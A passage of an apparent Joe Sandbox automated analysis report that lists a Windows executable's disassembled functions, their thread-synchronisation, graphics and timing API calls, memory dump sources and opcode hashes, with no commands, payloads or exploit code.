                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F6212
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F621C
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F6244
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000001,00000002,?,?,00000000,?,?,?,?,?,?,004F732F,?), ref: 004F6268
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F62A9
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F62B3
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F62DB
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000002.2724645820.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2724612522.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725077329.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006E7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006F5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000700000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.000000000073C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 7e8666cb07b5cacadf35492099d50c0e827f2b9a1fadfb76ea06a7d0beb11ddf
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 143f1fb28292c6c8f5848ec82d72cb0c1768edffe3cb57bca7300ec5568bca4f
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e8666cb07b5cacadf35492099d50c0e827f2b9a1fadfb76ea06a7d0beb11ddf
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2AA1113020430E8BC725DF349854BBBBBB9AF94304F15056EFA5687382DB79E809CB65
                                                                                                                                                                                                                                                                                                                          Function 004D7EF0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 92COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • StartDocA.GDI32(?,00000000), ref: 004D7F29
                                                                                                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(?,00000008), ref: 004D7F47
                                                                                                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(?,0000000A), ref: 004D7F55
                                                                                                                                                                                                                                                                                                                          • LPtoDP.GDI32(00000000,00000002), ref: 004D7F83
                                                                                                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000006E), ref: 004D7FA0
                                                                                                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000006F), ref: 004D7FAE
                                                                                                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 004D7FBC
                                                                                                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004D7FD2
                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000002.2724645820.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2724612522.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725077329.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006E7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006F5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000700000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.000000000073C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: CapsDevice$Start
                                                                                                                                                                                                                                                                                                                          • String ID: portrait
                                                                                                                                                                                                                                                                                                                          • API String ID: 1738886688-2504013051
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 87bb50d4ff0b2b6bcd955025618aa84fe9db738b10e38e5fb2dd326402729996
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 78bfa520cedcb1c13f518f393ea8421dc938ea51f70754ce75912898c89e0c82
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 87bb50d4ff0b2b6bcd955025618aa84fe9db738b10e38e5fb2dd326402729996
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7641DFB0604B109FC324DF2AD980A1AFBF5BF98710F108A1EE58A877A1D771E845CF91
                                                                                                                                                                                                                                                                                                                          Function 004F7040 Relevance: 15.3, APIs: 10, Instructions: 296timeCOMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000000,?,00000000,00000000,?,004AC0BD,?,?), ref: 004F705A
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F7081
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004F709A
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F70A3
                                                                                                                                                                                                                                                                                                                          • timeGetTime.WINMM(00000000,00000000,00000000,00000000,?), ref: 004F7390
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?), ref: 004F73D5
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000002.2724645820.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2724612522.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725077329.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006E7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006F5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000700000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.000000000073C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$Leave$Enter$Timetime
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 4022644143-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 619e67b58965c9b6edfd0f45f913366b2bb88d2215bcce8f286a8ccc74bc94e1
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 3d57daaa4b40982c2e4bbac1192c2a7fdd3e5fb289d79a2cbb097eeb1d58369f
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 619e67b58965c9b6edfd0f45f913366b2bb88d2215bcce8f286a8ccc74bc94e1
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 60A12B303083495BC7259F398890BBBBBE59F85700F04456EFA9AC7392DB6CE905D768
                                                                                                                                                                                                                                                                                                                          Function 004F2A10 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 79timeCOMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,00000000,004F7352,?), ref: 004F2A19
                                                                                                                                                                                                                                                                                                                          • timeGetTime.WINMM ref: 004F2A25
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F2A39
                                                                                                                                                                                                                                                                                                                          • timeGetTime.WINMM(?), ref: 004F2A46
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F2AD7
                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000002.2724645820.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2724612522.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725077329.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006E7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006F5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000700000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.000000000073C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$LeaveTimetime$Enter
                                                                                                                                                                                                                                                                                                                          • String ID: NetStream.Buffer.Empty$NetStream.Buffer.Full$status
                                                                                                                                                                                                                                                                                                                          • API String ID: 2943255653-4242577526
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 2800b6424f4894067f550383054d91bd5e105dc9488e734664937b715ac8d418
                                                                                                                                                                                                                                                                                                                          • Instruction ID: adfbc573f46a5ae42de3eb127535f59d6c3a8125dfae6686c248f3bcdabba04f
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2800b6424f4894067f550383054d91bd5e105dc9488e734664937b715ac8d418
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 33217471740705ABD7308F14DD86B6BB7A4FB50B21F24462BF267966D0C7B4B8408754
                                                                                                                                                                                                                                                                                                                          Function 004F3EC0 Relevance: 13.7, APIs: 9, Instructions: 245COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,004F5B64,00000002), ref: 004F3ED0
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F3EDE
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F3F20
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000002.2724645820.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2724612522.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725077329.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006E7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006F5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000700000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.000000000073C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 2978645861-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 34f8658622f1aa9e900f4973e8c3da322a382f9696d29d907fda60f1af10eeb7
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 85195bc957575009e4a7604c5a43e45099f91f30af12cfc7e5b33174ac27f883
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 34f8658622f1aa9e900f4973e8c3da322a382f9696d29d907fda60f1af10eeb7
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF81C0316047494FC724DF39989057BB7F1AF853117148A2FE6A787B81DB38E805CB68
                                                                                                                                                                                                                                                                                                                          Function 00401170 Relevance: 13.6, APIs: 9, Instructions: 124timeCOMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 00401181
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004011B1
                                                                                                                                                                                                                                                                                                                          • timeGetTime.WINMM ref: 004011C5
                                                                                                                                                                                                                                                                                                                          • timeGetTime.WINMM ref: 004011D5
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004011E3
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 0040122A
                                                                                                                                                                                                                                                                                                                          • timeGetTime.WINMM ref: 0040123E
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 00401261
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 0040129E
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000002.2724645820.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2724612522.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725077329.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006E7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006F5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000700000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.000000000073C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeaveTimetime
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 3486229058-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 5c08956a0c7860ec974705ddb8904b2646fc942159566fcab6cb5e79d3acde08
                                                                                                                                                                                                                                                                                                                          • Instruction ID: b4a63a4f06c8fcffd2d454e61e85ed039b73bf68413dd997414ba6e559c29426
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5c08956a0c7860ec974705ddb8904b2646fc942159566fcab6cb5e79d3acde08
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6641D6357003148FCB309F60E80466BB7F4AF6575470486AEE896BB3E1DB38EC459AA5
                                                                                                                                                                                                                                                                                                                          Function 00411A80 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 394COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • InterlockedExchange.KERNEL32(00000020,00000000), ref: 00411B68
                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000002.2724645820.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2724612522.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725077329.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006E7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006F5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000700000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.000000000073C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: ExchangeInterlocked
                                                                                                                                                                                                                                                                                                                          • String ID: GET$_bytesLoaded$_bytesTotal$_customHeaders$contentType$loaded
                                                                                                                                                                                                                                                                                                                          • API String ID: 367298776-2876428247
                                                                                                                                                                                                                                                                                                                          • Opcode ID: bc7a406daf2fbb0983bef868be79dd6fb756b60b2efaa2edd4b44b4e4be769b1
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 337a073203a489cf9af6a636d5e82807fd5ac3b12a53b57697a6972a4ae57270
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc7a406daf2fbb0983bef868be79dd6fb756b60b2efaa2edd4b44b4e4be769b1
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F6D126706047056BC714EF65D842AABB7E5BF88304F404A2EFA4687392EB38F945C799
                                                                                                                                                                                                                                                                                                                          Function 0079E841 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • type_info::operator==.LIBVCRUNTIME ref: 0079E960
                                                                                                                                                                                                                                                                                                                          • ___TypeMatch.LIBVCRUNTIME ref: 0079EA6E
                                                                                                                                                                                                                                                                                                                          • _UnwindNestedFrames.LIBCMT ref: 0079EBC0
                                                                                                                                                                                                                                                                                                                          • CallUnexpected.LIBVCRUNTIME ref: 0079EBDB
                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000003.2720989073.0000000000770000.00000040.00000400.00020000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_3_770000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                                                                                                                                                                                          • API String ID: 2751267872-393685449
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 239a4af11f55f81595298fdd8f27fa6654470999d4af52818c577849b92c20b2
                                                                                                                                                                                                                                                                                                                          • Instruction ID: f9205ae31db05b9c3e77d0985b0ed2a32128f774b51f4989d9f1137d4a0a37b6
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 239a4af11f55f81595298fdd8f27fa6654470999d4af52818c577849b92c20b2
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A3B15C71800209EFCF29DFA4E8859AEBBB5FF14310F14455AE815AB212D739EE51CF92
                                                                                                                                                                                                                                                                                                                          Function 004F34D0 Relevance: 11.4, APIs: 9, Instructions: 158COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000000,?,?,?,?,004F5BA3,00000000), ref: 004F34EA
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F3537
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F3545
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F3556
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F355F
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F3594
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F359D
                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F36AD
                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,004F5BA3,00000000), ref: 004F36BB
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000002.2724645820.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2724612522.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725077329.000000000053D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000555000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725144463.0000000000562000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000628000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006E7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.00000000006F5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.0000000000700000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2725258230.000000000073C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_400000_1718218388.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$Enter$Leave
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 2801635615-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 2acf0627a9549dec7f7e43e10a8dfb91ca38bb9d58e4ce9ffdfa8fec1b5a1733
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 93c01fc31a9ee7373f9c1d93048bf40271cec5808ab28bfcb2eca2428eaae834
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2acf0627a9549dec7f7e43e10a8dfb91ca38bb9d58e4ce9ffdfa8fec1b5a1733
